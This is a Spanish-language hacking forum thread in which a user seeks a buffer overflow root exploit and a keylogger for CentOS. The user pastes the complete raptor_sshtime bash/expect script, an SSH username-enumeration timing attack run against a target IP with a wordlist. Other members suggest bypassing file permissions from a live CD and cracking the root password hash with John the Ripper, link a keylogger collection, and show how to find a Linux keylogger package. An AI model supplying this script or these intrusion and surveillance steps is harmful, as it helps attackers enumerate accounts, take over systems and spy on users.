Resultados 1 al 18 de 18

Tema: overflow

  1. #1 overflow 
    Iniciado
    Fecha de ingreso
    Jun 2007
    Mensajes
    6
    Descargas
    0
    Uploads
    0
    k buenos dias,, necesito un favor
    algun superduro que me envie el procedimiento detallado para explotar vulnerabilidad de algunos de los programas propios de linux, desbordando el buffer de la pila, para cambiar la direccion de retorno y ejecutar la shellcode para conseguir privilegios de root, pero desde linea de comandos , con commandos de perl..

    milllll gracias
    Citar  
     

  2. #2  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    CALANDOLO, cualquier programa no es vulnerable como para conseguir un desbordamiento de búfer, sólo algunos programas en determinadas versiones.

    Si lo que quieres es aprender puedes buscar avisos de seguridad y exploits antiguos y las versiones afectadas.

    Normalmente el mismo exploit te dice cómo ha de ser ejecutado.

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  3. #3  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    Una forma de conseguir el pass del root, es con windows.. bien facil, bajate algun programa que lea ext3 desde win(con un liveCD también se puede), esos no hacen caso a ningun permiso y se puede obtener con el John the Ripper el pass.

    Se te complica a la hora de crackear el pass, imaginate si puso de pass "j8k6f4v9j" ufff nunca más lo vas a sacar xDD

    Saludos,
    Cypress
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  4. #4  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Ubicación
    online
    Mensajes
    789
    Descargas
    5
    Uploads
    0
    si quieres aprender sobre este tema buffer overflow, tienes qui un manual espero que te sirva, a mi me parece muy interesnate:

    http://www.acis.org.co/fileadmin/Bas...20050615_0.pdf
    Citar  
     

  5. #5  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Cita Iniciado por Cypress Ver mensaje
    imaginate si puso de pass "j8k6f4v9j" ufff nunca más lo vas a sacar xDD
    Justo ésa es la esencia de mi nick

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  6. #6  
    Avanzado
    Fecha de ingreso
    Sep 2006
    Ubicación
    online
    Mensajes
    789
    Descargas
    5
    Uploads
    0
    la verdad es que podria ser una buena contraseña bastante dificil de adivinar. CHaoo
    Citar  
     

  7. #7  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Sí. Una mejor:

    Código:
    pwgen -nc 50 1
    O lo que es similiar:

    Código:
    cau8roo7pah6beaThiquaizieconahFooch2ohz7IeVopewei4
    Y si añadimos símbolos y caracteres especiales la cosa se complica.

    Pero advierto que el crackeo de contraseñas poco tiene que ver con el desbordamiento de búfer, y pot tanto, se sale del tema del hilo

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  8. #8  
    Iniciado
    Fecha de ingreso
    Jun 2007
    Mensajes
    6
    Descargas
    0
    Uploads
    0
    Holas,,, muy buenos dias,,,, quien me ayuda con este exploit que voy a compilar y me genera cualquier cantidad de errores,,,
    quie me lo revisa y lo compila,,,
    un millon de gracias,,


    aqui lo pego

    #!/bin/bash

    #
    # $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
    #
    # raptor_sshtime - [Open]SSH remote timing attack exploit
    # Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
    #
    # OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
    # sends an error message when a user does not exist, which allows remote
    # attackers to determine valid usernames via a timing attack (CVE-2003-0190).
    #
    # OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
    # and possibly under limited configurations, allows remote attackers to
    # determine valid usernames via timing discrepancies in which responses take
    # longer for valid usernames than invalid ones, as demonstrated by sshtime.
    # NOTE: as of 20061014, it appears that this issue is dependent on the use of
    # manually-set passwords that causes delays when processing /etc/shadow due to
    # an increased number of rounds (CVE-2006-5229).
    #
    # This is a simple shell script based on expect meant to remotely analyze
    # timing differences in sshd "Permission denied" replies. Depending on OpenSSH
    # version and configuration, it may lead to disclosure of valid usernames.
    #
    # Usage example:
    # [make sure the target hostkey has been approved before]
    # ./sshtime 192.168.0.1 dict.txt
    #

    # Some vars
    port=22

    # Command line
    host=$1
    dict=$2

    # Local functions
    function head() {
    echo ""
    echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
    echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
    echo ""
    }

    function foot() {
    echo ""
    exit 0
    }

    function usage() {
    head
    echo "[make sure the target hostkey has been approved before]"
    echo ""
    echo "usage : ./sshtime <target> <wordlist>"
    echo "example: ./sshtime 192.168.0.1 dict.txt"
    foot
    }

    function notfound() {
    head
    echo "error : expect interpreter not found!"
    foot
    }

    # Check if expect is there
    expect=`which expect 2>/dev/null`
    if [ $? -ne 0 ]; then
    notfound
    fi

    # Input control
    if [ -z "$2" ]; then
    usage
    fi

    # Perform the bruteforce attack
    head

    for user in `cat $dict`
    do
    echo -ne "$user@$host\t\t"
    (time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
    done

    foot
    Citar  
     

  9. #9  
    Iniciado
    Fecha de ingreso
    Jun 2007
    Mensajes
    6
    Descargas
    0
    Uploads
    0
    ah,,, alguien que me regale un key logger bien bueno para linux centos

    mi corre editado

    este es el correo que uso para los foros ,, mi direccion seria es otra
    Última edición por j8k6f4v9j; 04-10-2007 a las 22:36 Razón: NOMAILS
    Citar  
     

  10. #10  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    ¿No es eso un poco cómodo?

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  11. #11  
    Co-Admin HackHispano.com Avatar de clarinetista
    Fecha de ingreso
    Jan 2004
    Ubicación
    HackHispano/SM
    Mensajes
    7.709
    Descargas
    30
    Uploads
    8
    Joder "un poco"...........
    Citar  
     

  12. #12  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Por cierto, es un script en bash, así que es más que normal que te dé errores al compilar xD

    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  13. #13  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    como dice j8 ^ leyendo tu post estaba punto de escribir lo mismo, pero j8 se me adelanto xD

    pero para que no te vuelva a pasar lo del compilador o interprete, la forma de darte cuenta, es saber en qué lenguaje está programado.

    - bue.. lo ideal seria entender el exploit -

    En tu caso, salta a la luz por esto:

    Código:
    #!/bin/bash
    te está dando la ruta del interprete, bash.

    Código en Perl Python o PHP son todos interpretados,

    Aunque existe activeperl.. o algo así, que se puede compilar.

    En el caso de C que es un lenguaje compilado, basta ver las librerias importadas
    cuando en un código ves algo que empieza con:
    Código:
    #include <stdio.h>
    o 
    #include <algo.h>
    eso es C ^

    y bue.. más o menos esos son los lenguajes que vas a encontrar donde están echos los exploits.

    Saludos.
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  14. #14 ayuda exploit 
    Iniciado
    Fecha de ingreso
    Jun 2007
    Mensajes
    6
    Descargas
    0
    Uploads
    0
    ok,, muchas gracias,, pero trato de ejecutarlo asi:
    sh exploit.sh IP remota dict.txt y tambien saca errores,,, o
    ./sshtime IP remota dict.txt y tampoco
    el dict.txt puede ser un diccionario cualquiera?,, por que deproto ese es el
    problema


    de antemano mil gracias,,,
    ah y regalenme por fa un keylogger bueno para linux centos 4.1
    Citar  
     

  15. #15  
    Moderador HH
    Fecha de ingreso
    Nov 2006
    Mensajes
    1.516
    Descargas
    7
    Uploads
    0
    Cita Iniciado por CALONDOLO Ver mensaje
    ah y regalenme por fa un keylogger bueno para linux centos 4.1

    Venga, te voy a ayudar con el KeyLogger: KeyLogger´s

    Te aseguro que los que hay en esta web van muy bien, ademas hay para linux y muchos para Win

    Un saludo
    Mess with the best, die like the rest.


    Hazle a los demas... antes de que te hagan a ti.
    Citar  
     

  16. #16  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Cita Iniciado por CALONDOLO Ver mensaje
    ok,, muchas gracias,, pero trato de ejecutarlo asi:
    sh exploit.sh IP remota dict.txt y tambien saca errores,,, o
    ./sshtime IP remota dict.txt y tampoco
    el dict.txt puede ser un diccionario cualquiera?,, por que deproto ese es el
    problema
    "errores" es algo impreciso. Algo como esto estaría mejor para depurar el problema:
    Código:
    ./sshtime 192.168.1.55 dict.txt
    
    ssh: connect to host 192.168.1.55 port 22: Connection refused

    Cita Iniciado por CALONDOLO Ver mensaje
    de antemano mil gracias,,,
    ah y regalenme por fa un keylogger bueno para linux centos 4.1
    Los keyloggers de fuentes abiertas ya se encargaron sus desarrolladores de regalártelos. Ahora te toca, como bien dice RaidMan, buscarlos.

    lkm?
    Código:
    t:~$ apt-cache search keylogger
    lkl - userspace keylogger for x86 architecture
    Código:
    Package: lkl
    Priority: optional
    Section: utils
    Installed-Size: 124
    Maintainer: Jean-Michel Kelbert <kelbert@debian.org>
    Architecture: i386
    Version: 0.1.1-1
    Depends: libc6 (>= 2.3.2.ds1-21)
    Filename: pool/main/l/lkl/lkl_0.1.1-1_i386.deb
    Size: 10146
    MD5sum: fed5f8c3a688287cfdc28a8e84237832
    SHA1: 4f3e059d858918734c99c24ad18e12ca34e8d802
    SHA256: b9885ee19fc35f9043eb8526c49b2c44fb6fa9d7c72fe971269d7e815f7e737b
    Description: userspace keylogger for x86 architecture
     LKL is a userspace keylogger that runs under Linux on the x86
     architechture. LKL sniffs and logs everything that passes through the
     hardware keyboard port (0x60). It translates keycodes to ASCII with a
     keymap file.
    Tag: hardware::input:keyboard, network::server, role::program
    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  17. #17  
    Colaborador HH
    Fecha de ingreso
    Jun 2006
    Ubicación
    Uruguay
    Mensajes
    1.450
    Descargas
    11
    Uploads
    0
    wooow no sabia que con apt podia buscar paquetes !! cada día me sorprendo más Gracias j8

    siento que me estoy perdiendo mucho de apt

    Saludos.
    Louis Armstrong le dice a Ella Fitzgerald
    "take another drink of wine, and maybe you change your mind"
    Citar  
     

  18. #18  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    apt busca en los repositorios incluídos en /etc/apt/sources.list. Pero también hace muchas otras cosas: mostrar descripciones, dependencias, versiones, etc.

    Código:
    man apt
    Salu2


    Keep on Rollin'

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

Temas similares

  1. Integer Buffer Overflow
    Por __BoKeN__ en el foro VULNERABILIDADES
    Respuestas: 1
    Último mensaje: 06-05-2005, 21:39
  2. ISAPI .printer overflow
    Por elvizo en el foro INTRUSION
    Respuestas: 4
    Último mensaje: 30-01-2004, 14:41
  3. buffer overflow
    Por TseTse en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 24-11-2002, 16:52
  4. Buffer overflow vulnerability
    Por TseTse en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 24-11-2002, 16:48
  5. Overflow ftp
    Por eXcalibur en el foro GENERAL
    Respuestas: 5
    Último mensaje: 01-07-2002, 10:39

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •